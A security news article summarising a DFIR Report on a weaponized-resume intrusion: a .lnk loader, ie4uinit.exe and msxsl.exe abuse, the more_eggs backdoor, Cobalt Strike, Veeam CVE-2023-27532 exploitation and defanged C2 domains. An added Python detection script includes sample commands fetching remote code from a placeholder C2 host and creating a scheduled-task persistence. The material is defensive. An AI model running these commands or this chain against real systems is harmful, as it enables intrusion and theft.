Hackers Used Weaponized Resume To Infect User & Moved To Server Environments – Incident Report

A sophisticated cyber attack was detected in March 2024, revealing a complex intrusion that began with a weaponized resume and culminated in the compromise of multiple servers.

This incident highlights the evolving tactics of threat actors and the importance of robust cybersecurity measures.

The attack started when a threat actor, identified as TA4557 by Proofpoint, submitted a malicious job application.

This group has historical connections to FIN6 and shares tooling similarities with Cobalt Group and Evilnum.

Security analysts at The DFIR Report discovered that the victim, lured by a fake online resume, downloaded and executed a malicious .lnk file from a zip archive named “John Shimkus.zip”.

Fake Resumes (Source – The DFIR Report)


Infection Chain

The infection process involved several stages:-

  1. Execution of a Windows Shortcut (.lnk) file
  2. Abuse of ie4uinit.exe (a legitimate Microsoft executable)
  3. Deployment of the more_eggs backdoor
  4. Installation of Cobalt Strike beacon

The initial payload used obfuscated commands to create an .inf file and move a legitimate copy of ie4uinit.exe to a custom location.

Infection Chain (Source – The DFIR Report)

This technique, an abuse of a living-off-the-land binary (LOLBin), allowed the attacker to load and execute COM scriptlets from remote servers.

The more_eggs backdoor was deployed using the msxsl.exe binary, a technique documented in the LOLBAS project.

This malware maintained communication with its command and control (C2) server and relied on a scheduled task for persistence.
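As an added detection example (not code from The DFIR Report or Cyber Security News), the following Python scores constructed process-creation events against the three behaviours just described: a relocated ie4uinit.exe, msxsl.exe fetching a remote stylesheet, and a scheduled task whose action lives in a user-writable path. The sample paths, task name and C2 hostname are placeholders, not values from the report.

```python
import ntpath
import re

# Locations where the genuine ie4uinit.exe is expected to live
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Directories a standard user can write to (heuristic, not exhaustive)
USER_WRITABLE = re.compile(r"c:\\users\\|\\appdata\\|\\temp\\|\\programdata\\")

def classify(event: dict) -> list[str]:
    """Return the detection tags that fire for one process-creation event."""
    image = event["image"].lower()
    name = ntpath.basename(image)
    cmd = event.get("command_line", "").lower()
    tags = []
    # Stage 2: a copy of ie4uinit.exe running from anywhere but System32/SysWOW64
    if name == "ie4uinit.exe" and ntpath.dirname(image) not in SYSTEM_DIRS:
        tags.append("ie4uinit_outside_system_dir")
    # Stage 3: msxsl.exe is not shipped with Windows; a remote XSL is worse still
    if name == "msxsl.exe":
        tags.append("msxsl_remote_xsl" if "http" in cmd else "msxsl_execution")
    # Persistence: a scheduled task whose action points into a user-writable path
    if name == "schtasks.exe" and "/create" in cmd and USER_WRITABLE.search(cmd):
        tags.append("schtasks_user_writable_action")
    return tags

def scan(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run classify() over a batch and keep only the events that fired."""
    return [(ntpath.basename(ev["image"]), tags)
            for ev in events if (tags := classify(ev))]

# Constructed sample events (not from the report), shaped like EDR records
SAMPLE_EVENTS = [
    # Benign: the real ie4uinit.exe in its normal location
    {"image": r"C:\Windows\System32\ie4uinit.exe", "command_line": "ie4uinit.exe"},
    # Stage 2: relocated copy placed next to the attacker-created .inf
    {"image": r"C:\Users\jdoe\AppData\Local\Temp\ie4uinit.exe", "command_line": "ie4uinit.exe"},
    # Stage 3: msxsl.exe pulling a remote stylesheet (hostname is a placeholder)
    {"image": r"C:\Users\jdoe\AppData\Local\Temp\msxsl.exe",
     "command_line": "msxsl.exe http://c2.example.invalid/a.xml http://c2.example.invalid/a.xsl"},
    # Persistence: scheduled task pointing into the user profile
    {"image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /create /tn "Updater" /tr "C:\Users\jdoe\AppData\Roaming\run.cmd" /sc minute /mo 30'},
]

if __name__ == "__main__":
    for name, tags in scan(SAMPLE_EVENTS):
        print(name, tags)
```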

After initial infection, the threat actor:-

  1. Deployed Cobalt Strike on the beachhead host
  2. Exploited CVE-2023-27532 in Veeam software on a backup server
  3. Created new local administrator accounts
  4. Used RDP to connect to compromised servers
  5. Installed Cloudflared for tunneling traffic

The attacker used a modified version of VeeamHax to exploit the Veeam vulnerability, enabling them to execute arbitrary SQL commands and create a local administrator account.

VeeamHax Difference (Source – The DFIR Report)

The threat actor employed various techniques for credential access and network discovery:-

  • Accessed LSASS memory for credentials
  • Used tools like Seatbelt and SharpShares for enumeration
  • Executed adfind.exe for domain reconnaissance
  • Utilized SoftPerfect Network Scanner for network mapping

Two primary C2 channels were observed:-

  1. more_eggs payload communicating with pin.howasit[.]com
  2. Cobalt Strike beacon connecting to shehasgone[.]com

The timeline of the intrusion is shown below:-

Timeline (Source – The DFIR Report)

This incident demonstrates the sophisticated tactics employed by modern threat actors, combining social engineering, exploitation of vulnerabilities, and advanced post-exploitation techniques.

Organizations must remain vigilant and implement comprehensive security measures to defend against such multi-stage attacks.


The post Hackers Used Weaponized Resume To Infect User & Moved To Server Environments – Incident Report appeared first on Cyber Security News.